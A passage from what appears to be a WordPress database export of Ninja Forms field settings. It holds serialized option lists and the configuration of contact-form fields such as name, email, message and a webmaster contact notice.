Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"Vahana Team Member\";s:5:\"value\";s:18:\"Vahana Team Member\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Potluck Help With Food\";s:5:\"value\";s:22:\"Potluck Help With Food\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:11:\"Vahana Desk\";s:5:\"value\";s:11:\"Vahana Desk\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"Vahana Team Member\";s:5:\"value\";s:18:\"Vahana Team Member\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8975,275,'editActive','','editActive',''),(8976,275,'field_label','Text','field_label','Text'),(8977,275,'field_key','html_321','field_key','html_321'),(7788,271,'key','listmultiselect_237','key','listmultiselect_237'),(7789,271,'container_class',' one-third first ','container_class',' one-third first '),(7790,271,'parent_id','24','parent_id','24'),(7791,272,'objectType','Field','objectType','Field'),(7792,272,'objectDomain','fields','objectDomain','fields'),(7793,272,'editActive','','editActive',''),(7794,272,'order','16','order','16'),(7795,272,'type','textarea','type','textarea'),(7796,272,'label','Message (optional)','label','Message (optional)'),(7797,272,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7798,272,'label_pos','above','label_pos','above'),(7799,272,'default_value','','default_value',''),(7800,272,'textarea_rte','0','textarea_rte','0'),(7801,272,'textarea_media','0','textarea_media','0'),(7802,272,'disable_rte_mobile','0','disable_rte_mobile','0'),(7803,272,'input_limit','','input_limit',''),(7804,272,'input_limit_type','char','input_limit_type','char'),(7805,272,'calc_auto_include','0','calc_auto_include','0'),(7806,272,'num_sort','0','num_sort','0'),(7807,272,'admin_label','','admin_label',''),(7808,272,'show_help','0','show_help','0'),(7809,272,'help_text','','help_text',''),(7810,272,'show_desc','0','show_desc','0'),(7811,272,'desc_pos','none','desc_pos','none'),(7812,272,'desc_text','','desc_text',''),(7813,272,'element_class','','element_class',''),(7814,272,'required','0','required','0'),(7815,272,'default','','default',''),(7816,272,'key','textarea_229','key','textarea_229'),(7817,272,'placeholder','','placeholder',''),(7818,272,'container_class','','container_class',''),(7819,272,'manual_key','','manual_key',''),(7820,272,'parent_id','24','parent_id','24'),(17380,612,'order','12','order','12'),(17379,612,'editActive','','editActive',''),(17378,611,'drawerDisabled','','drawerDisabled',''),(17376,611,'element_class','','element_class',''),(17377,611,'key','html_1663797502959','key','html_1663797502959'),(17375,611,'container_class','','container_class',''),(7838,274,'objectType','Field','objectType','Field'),(7839,274,'objectDomain','fields','objectDomain','fields'),(7840,274,'editActive','','editActive',''),(7841,274,'order','18','order','18'),(7842,274,'type','submit','type','submit'),(7843,274,'label','Submit','label','Submit'),(7844,274,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7845,274,'show_help','0','show_help','0'),(7846,274,'help_text','','help_text',''),(7847,274,'show_desc','0','show_desc','0'),(7848,274,'desc_pos','none','desc_pos','none'),(7849,274,'desc_text','','desc_text',''),(7850,274,'processing_label','Processing','processing_label','Processing'),(7851,274,'element_class','','element_class',''),(7852,274,'key','submit_231','key','submit_231'),(7853,274,'container_class','','container_class',''),(7854,274,'parent_id','24','parent_id','24'),(7855,275,'type','html','type','html'),(7856,275,'order','1','order','1'),(7857,275,'fav_id','','fav_id',''),(7858,275,'def_id','','def_id',''),(7859,275,'label','Text','label','Text'),(7860,275,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7861,275,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.'),(7862,275,'desc_el','div','desc_el','div'),(7863,275,'show_desc','0','show_desc','0'),(7864,275,'desc_pos','none','desc_pos','none'),(7865,275,'desc_text','','desc_text',''),(7866,275,'element_class','','element_class',''),(7867,275,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.'),(7868,275,'key','html_321','key','html_321'),(7869,275,'parent_id','25','parent_id','25'),(7870,276,'type','textbox','type','textbox'),(7871,276,'order','2','order','2'),(7872,276,'fav_id','','fav_id',''),(7873,276,'def_id','6','def_id','6'),(7874,276,'label','First Name','label','First Name'),(7875,276,'label_pos','above','label_pos','above'),(7876,276,'mask','','mask',''),(7877,276,'datepicker','0','datepicker','0'),(7878,276,'first_name','1','first_name','1'),(7879,276,'last_name','0','last_name','0'),(7880,276,'from_name','0','from_name','0'),(7881,276,'user_info_field_group','1','user_info_field_group','1'),(7882,276,'show_help','0','show_help','0'),(7883,276,'help_text','','help_text',''),(7884,276,'calc_auto_include','0','calc_auto_include','0'),(7885,276,'calc_option','0','calc_option','0'),(7886,276,'placeholder','','placeholder',''),(7887,276,'user_address_1','','user_address_1',''),(7888,276,'user_address_2','','user_address_2',''),(7889,276,'user_city','','user_city',''),(7890,276,'user_zip','','user_zip',''),(7891,276,'user_phone','','user_phone',''),(7892,276,'user_email','','user_email',''),(7893,276,'disable_input','0','disable_input','0'),(7894,276,'input_limit','','input_limit',''),(7895,276,'input_limit_type','char','input_limit_type','char'),(7896,276,'input_limit_msg','','input_limit_msg',''),(7897,276,'user_state','0','user_state','0'),(7898,276,'autocomplete_off','0','autocomplete_off','0'),(7899,276,'num_sort','0','num_sort','0'),(7900,276,'admin_label','','admin_label',''),(7901,276,'user_info_field_group_name','','user_info_field_group_name',''),(7902,276,'user_info_field_group_custom','','user_info_field_group_custom',''),(7903,276,'show_desc','0','show_desc','0'),(7904,276,'desc_pos','none','desc_pos','none'),(7905,276,'desc_text','','desc_text',''),(7906,276,'element_class','','element_class',''),(7907,276,'required','1','required','1'),(7908,276,'key','textbox_322','key','textbox_322'),(7909,276,'parent_id','25','parent_id','25'),(7910,277,'type','lastname','type','lastname'),(7911,277,'order','3','order','3'),(7912,277,'fav_id','','fav_id',''),(7913,277,'def_id','7','def_id','7'),(7914,277,'label','Last Name','label','Last Name'),(7915,277,'label_pos','above','label_pos','above'),(7916,277,'mask','','mask',''),(7917,277,'datepicker','0','datepicker','0'),(7918,277,'first_name','0','first_name','0'),(7919,277,'from_name','0','from_name','0'),(7920,277,'user_info_field_group','1','user_info_field_group','1'),(7921,277,'show_help','0','show_help','0'),(7922,277,'help_text','','help_text',''),(7923,277,'calc_auto_include','0','calc_auto_include','0'),(7924,277,'calc_option','0','calc_option','0'),(7925,277,'placeholder','','placeholder',''),(7926,277,'user_address_1','','user_address_1',''),(7927,277,'user_address_2','','user_address_2',''),(7928,277,'user_city','','user_city',''),(7929,277,'user_zip','','user_zip',''),(7930,277,'user_phone','','user_phone',''),(7931,277,'user_email','','user_email',''),(7932,277,'disable_input','0','disable_input','0'),(7933,277,'input_limit','','input_limit',''),(7934,277,'input_limit_type','char','input_limit_type','char'),(7935,277,'input_limit_msg','','input_limit_msg',''),(7936,277,'user_state','0','user_state','0'),(7937,277,'autocomplete_off','0','autocomplete_off','0'),(7938,277,'num_sort','0','num_sort','0'),(7939,277,'admin_label','','admin_label',''),(7940,277,'user_info_field_group_name','','user_info_field_group_name',''),(7941,277,'user_info_field_group_custom','','user_info_field_group_custom',''),(7942,277,'show_desc','0','show_desc','0'),(7943,277,'desc_pos','none','desc_pos','none'),(7944,277,'desc_text','','desc_text',''),(7945,277,'element_class','','element_class',''),(7946,277,'required','1','required','1'),(7947,277,'key','lastname_323','key','lastname_323'),(7948,277,'parent_id','25','parent_id','25'),(7949,278,'type','email','type','email'),(7950,278,'order','4','order','4'),(7951,278,'fav_id','','fav_id',''),(7952,278,'def_id','14','def_id','14'),(7953,278,'label','Email','label','Email'),(7954,278,'label_pos','above','label_pos','above'),(7955,278,'mask','','mask',''),(7956,278,'datepicker','0','datepicker','0'),(7957,278,'first_name','0','first_name','0'),(7958,278,'last_name','0','last_name','0'),(7959,278,'from_name','0','from_name','0'),(7960,278,'user_address_1','0','user_address_1','0'),(7961,278,'user_address_2','0','user_address_2','0'),(7962,278,'user_city','0','user_city','0'),(7963,278,'user_zip','0','user_zip','0'),(7964,278,'user_phone','0','user_phone','0'),(7965,278,'user_info_field_group','1','user_info_field_group','1'),(7966,278,'show_help','0','show_help','0'),(7967,278,'help_text','','help_text',''),(7968,278,'calc_auto_include','0','calc_auto_include','0'),(7969,278,'calc_option','0','calc_option','0'),(7970,278,'placeholder','','placeholder',''),(7971,278,'disable_input','0','disable_input','0'),(7972,278,'input_limit','','input_limit',''),(7973,278,'input_limit_type','char','input_limit_type','char'),(7974,278,'input_limit_msg','','input_limit_msg',''),(7975,278,'user_state','0','user_state','0'),(7976,278,'autocomplete_off','0','autocomplete_off','0'),(7977,278,'num_sort','0','num_sort','0'),(7978,278,'admin_label','','admin_label',''),(7979,278,'user_info_field_group_name','','user_info_field_group_name',''),(7980,278,'user_info_field_group_custom','','user_info_field_group_custom',''),(7981,278,'show_desc','0','show_desc','0'),(7982,278,'desc_pos','none','desc_pos','none'),(7983,278,'desc_text','','desc_text',''),(7984,278,'element_class','','element_class',''),(7985,278,'required','1','required','1'),(7986,278,'key','email_324','key','email_324'),(7987,278,'parent_id','25','parent_id','25'),(7988,279,'type','hr','type','hr'),(7989,279,'order','5','order','5'),(7990,279,'fav_id','','fav_id',''),(7991,279,'def_id','','def_id',''),(7992,279,'label','hr','label','hr'),(7993,279,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7994,279,'show_desc','0','show_desc','0'),(7995,279,'desc_pos','none','desc_pos','none'),(7996,279,'desc_text','','desc_text',''),(7997,279,'element_class','','element_class',''),(7998,279,'key','hr_325','key','hr_325'),(7999,279,'parent_id','25','parent_id','25'),(8000,280,'type','textbox','type','textbox'),(8001,280,'order','6','order','6'),(8002,280,'fav_id','','fav_id',''),(8003,280,'def_id','','def_id',''),(8004,280,'label','Message Subject','label','Message Subject'),(8005,280,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(8006,280,'label_pos','above','label_pos','above'),(8007,280,'placeholder','','placeholder',''),(8008,280,'first_name','','first_name',''),(8009,280,'last_name','','last_name',''),(8010,280,'user_address_1','','user_address_1',''),(8011,280,'user_address_2','','user_address_2',''),(8012,280,'user_city','','user_city',''),(8013,280,'user_zip','','user_zip',''),(8014,280,'user_phone','','user_phone',''),(8015,280,'user_email','','user_email',''),(8016,280,'user_info_field_group','1','user_info_field_group','1'),(8017,280,'disable_input','0','disable_input','0'),(8018,280,'mask','','mask',''),(8019,280,'input_limit','','input_limit',''),(8020,280,'input_limit_type','char','input_limit_type','char'),(8021,280,'calc_auto_include','0','calc_auto_include','0'),(8022,280,'datepicker','0','datepicker','0'),(8023,280,'user_state','0','user_state','0'),(8024,280,'autocomplete_off','0','autocomplete_off','0'),(8025,280,'num_sort','0','num_sort','0'),(8026,280,'admin_label','','admin_label',''),(8027,280,'user_info_field_group_name','','user_info_field_group_name',''),(8028,280,'user_info_field_group_custom','','user_info_field_group_custom',''),(8029,280,'show_help','0','show_help','0'),(8030,280,'help_text','','help_text',''),(8031,280,'show_desc','0','show_desc','0'),(8032,280,'desc_pos','none','desc_pos','none'),(8033,280,'desc_text','','desc_text',''),(8034,280,'element_class','','element_class',''),(8035,280,'required','1','required','1'),(8036,280,'key','textbox_326','key','textbox_326'),(8037,280,'parent_id','25','parent_id','25'),(8038,281,'type','textarea','type','textarea'),(8039,281,'order','7','order','7'),(8040,281,'fav_id','','fav_id',''),(8041,281,'def_id','','def_id',''),(8042,281,'label','Enter Your Message Here','label','Enter Your Message Here'),(8043,281,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(8044,281,'label_pos','above','label_pos','above'),(8045,281,'default_value','','default_value',''),(8046,281,'textarea_rte','0','textarea_rte','0'),(8047,281,'textarea_media','0','textarea_media','0'),(8048,281,'disable_rte_mobile','0','disable_rte_mobile','0'),(8049,281,'input_limit','','input_limit',''),(8050,281,'input_limit_type','char','input_limit_type','char'),(8051,281,'calc_auto_include','0','calc_auto_include','0'),(8052,281,'num_sort','0','num_sort','0'),(8053,281,'admin_label','','admin_label',''),(8054,281,'show_help','0','show_help','0'),(8055,281,'help_text','','help_text',''),(8056,281,'show_desc','0','show_desc','0'),(8057,281,'desc_pos','none','desc_pos','none'),(8058,281,'desc_text','','desc_text',''),(8059,281,'element_class','','element_class',''),(8060,281,'required','1','required','1'),(8061,281,'default','','default',''),(8062,281,'key','textarea_327','key','textarea_327'),(8063,281,'parent_id','25','parent_id','25'),(8064,282,'type','html','type','html'),(8065,282,'order','8','order','8'),(8066,282,'fav_id','','fav_id',''),(8067,282,'def_id','','def_id',''),(8068,282,'label','Text','label','Text'),(8069,282,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(8070,282,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(8071,282,'desc_el','div','desc_el','div'),(8072,282,'show_desc','0','show_desc','0'),(8073,282,'desc_pos','none','desc_pos','none'),(8074,282,'desc_text','','desc_text',''),(8075,282,'element_class','','element_class',''),(8076,282,'default','<b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b>','default','<b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b>'),(8077,282,'key','html_328','key','html_328'),(8078,282,'parent_id','25','parent_id','25'),(17370,611,'order','12','order','12'),(17369,611,'editActive','','editActive',''),(17367,610,'element_class','','element_class',''),(17368,610,'key','html_1663797370980','key','html_1663797370980'),(17366,610,'container_class','','container_class',''),(17365,610,'default','','default',''),(17364,610,'label','HTML','label','HTML'),(17363,610,'type','html','type','html'),(17362,610,'idAttribute','id','idAttribute','id'),(17361,610,'order','11','order','11'),(17360,610,'editActive','','editActive',''),(8092,284,'type','submit','type','submit'),(8093,284,'order','10','order','10'),(8094,284,'fav_id','','fav_id',''),(8095,284,'def_id','','def_id',''),(8096,284,'label','Submit','label','Submit'),(8097,284,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(8098,284,'show_help','0','show_help','0'),(8099,284,'help_text','','help_text',''),(8100,284,'show_desc','0','show_desc','0'),(8101,284,'desc_pos','none','desc_pos','none'),(8102,284,'desc_text','','desc_text',''),(8103,284,'processing_label','Processing','processing_label','Processing'),(8104,284,'element_class','','element_class',''),(8105,284,'key','submit_330','key','submit_330'),(8106,284,'parent_id','25','parent_id','25'),(8107,5,'field_label','Text','field_label','Text'),(8108,5,'field_key','html_141','field_key','html_141'),(8109,6,'field_label','First Name','field_label','First Name'),(8110,6,'field_key','textbox_142','field_key','textbox_142'),(8111,6,'custom_name_attribute','','custom_name_attribute',''),(8112,6,'personally_identifiable','','personally_identifiable',''),(8113,6,'value','','value',''),(8114,7,'field_label','Last Name','field_label','Last Name'),(8115,7,'field_key','lastname_143','field_key','lastname_143'),(8116,7,'custom_name_attribute','lname','custom_name_attribute','lname'),(8117,7,'personally_identifiable','1','personally_identifiable','1'),(8118,7,'value','','value',''),(8119,8,'field_label','Email','field_label','Email'),(8120,8,'field_key','email_144','field_key','email_144'),(8121,8,'custom_name_attribute','email','custom_name_attribute','email'),(8122,8,'personally_identifiable','1','personally_identifiable','1'),(8123,8,'value','','value',''),(8124,9,'field_label','Phone','field_label','Phone'),(8125,9,'field_key','phone_145','field_key','phone_145'),(8126,9,'custom_name_attribute','phone','custom_name_attribute','phone'),(8127,9,'personally_identifiable','1','personally_identifiable','1'),(8128,9,'value','','value',''),(8129,10,'field_label','Your Local Area','field_label','Your Local Area'),(8130,10,'field_key','listselect_146','field_key','listselect_146'),(12170,379,'user_city','0','user_city','0'),(12166,379,'last_name','0','last_name','0'),(8135,13,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8136,13,'field_key','listselect_149','field_key','listselect_149'),(8137,14,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8138,14,'field_key','textarea_150','field_key','textarea_150'),(8139,14,'value','','value',''),(17630,637,'container_class','','container_class',''),(8142,16,'field_label','Submit','field_label','Submit'),(8143,16,'field_key','submit_152','field_key','submit_152'),(8235,42,'field_label','Text','field_label','Text'),(8236,42,'field_key','html_80','field_key','html_80'),(8237,43,'field_label','First Name','field_label','First Name'),(8238,43,'field_key','textbox_81','field_key','textbox_81'),(8239,43,'custom_name_attribute','','custom_name_attribute',''),(8240,43,'personally_identifiable','','personally_identifiable',''),(8241,43,'value','','value',''),(8242,44,'field_label','Last Name','field_label','Last Name'),(8243,44,'field_key','lastname_82','field_key','lastname_82'),(8244,44,'custom_name_attribute','lname','custom_name_attribute','lname'),(8245,44,'personally_identifiable','1','personally_identifiable','1'),(8246,44,'value','','value',''),(8247,45,'field_label','Email','field_label','Email'),(8248,45,'field_key','email_83','field_key','email_83'),(8249,45,'custom_name_attribute','email','custom_name_attribute','email'),(8250,45,'personally_identifiable','1','personally_identifiable','1'),(8251,45,'value','','value',''),(8252,46,'field_label','Phone','field_label','Phone'),(8253,46,'field_key','phone_84','field_key','phone_84'),(8254,46,'custom_name_attribute','phone','custom_name_attribute','phone'),(8255,46,'personally_identifiable','1','personally_identifiable','1'),(8256,46,'value','','value',''),(8257,47,'field_label','Your Local Area','field_label','Your Local Area'),(8258,47,'field_key','listselect_85','field_key','listselect_85'),(8263,50,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8264,50,'field_key','listselect_88','field_key','listselect_88'),(8265,51,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8266,51,'field_key','textarea_89','field_key','textarea_89'),(8267,51,'value','','value',''),(17031,599,'container_class','','container_class',''),(17030,599,'field_key','html_267','field_key','html_267'),(8270,53,'field_label','Submit','field_label','Submit'),(8271,53,'field_key','submit_91','field_key','submit_91'),(8282,57,'value','','value',''),(8283,58,'field_label','Phone','field_label','Phone'),(8284,58,'field_key','phone_97','field_key','phone_97'),(8285,58,'value','','value',''),(8286,59,'field_label','Your Local Area','field_label','Your Local Area'),(8287,59,'field_key','listselect_98','field_key','listselect_98'),(12232,380,'user_state','0','user_state','0'),(12233,380,'autocomplete_off','0','autocomplete_off','0'),(12234,380,'num_sort','0','num_sort','0'),(8292,62,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8293,62,'field_key','listselect_101','field_key','listselect_101'),(8294,63,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8295,63,'field_key','textarea_102','field_key','textarea_102'),(8296,63,'value','','value',''),(8299,65,'field_label','Submit','field_label','Submit'),(8300,65,'field_key','submit_104','field_key','submit_104'),(8314,69,'field_label','Email','field_label','Email'),(8315,69,'field_key','email_23','field_key','email_23'),(8316,69,'custom_name_attribute','email','custom_name_attribute','email'),(8317,69,'personally_identifiable','1','personally_identifiable','1'),(8318,69,'value','','value',''),(8319,70,'field_label','Phone','field_label','Phone'),(8320,70,'field_key','phone_24','field_key','phone_24'),(8321,70,'custom_name_attribute','phone','custom_name_attribute','phone'),(8322,70,'personally_identifiable','1','personally_identifiable','1'),(8323,70,'value','','value',''),(8324,71,'field_label','Your Local Area','field_label','Your Local Area'),(8325,71,'field_key','listselect_25','field_key','listselect_25'),(8326,72,'field_label','hr','field_label','hr'),(8327,72,'field_key','hr_26','field_key','hr_26'),(8328,73,'field_label','Colorado Leadership Positions','field_label','Colorado Leadership Positions'),(8329,73,'field_key','html_27','field_key','html_27'),(8330,74,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8331,74,'field_key','listselect_28','field_key','listselect_28'),(8332,75,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8333,75,'field_key','textarea_29','field_key','textarea_29'),(8334,75,'value','','value',''),(17574,631,'drawerDisabled','','drawerDisabled',''),(17575,632,'editActive','','editActive',''),(17573,631,'key','html_1663800560932','key','html_1663800560932'),(8337,77,'field_label','Submit','field_label','Submit'),(8338,77,'field_key','submit_31','field_key','submit_31'),(8350,80,'personally_identifiable','1','personally_identifiable','1'),(8351,80,'value','','value',''),(8352,81,'field_label','Email','field_label','Email'),(8353,81,'field_key','email_241','field_key','email_241'),(8354,81,'custom_name_attribute','email','custom_name_attribute','email'),(8355,81,'personally_identifiable','1','personally_identifiable','1'),(8356,81,'value','','value',''),(8357,82,'field_label','Phone','field_label','Phone'),(8358,82,'field_key','phone_242','field_key','phone_242'),(8359,82,'custom_name_attribute','phone','custom_name_attribute','phone'),(8360,82,'personally_identifiable','1','personally_identifiable','1'),(8361,82,'value','','value',''),(8362,83,'field_label','Your Local Area','field_label','Your Local Area'),(8363,83,'field_key','listselect_243','field_key','listselect_243'),(8364,84,'field_label','hr','field_label','hr'),(8365,84,'field_key','hr_244','field_key','hr_244'),(8366,85,'field_label','What Is Your Idea?','field_label','What Is Your Idea?'),(8367,85,'field_key','html_245','field_key','html_245'),(8368,86,'field_label',' Give Your Idea A Title','field_label',' Give Your Idea A 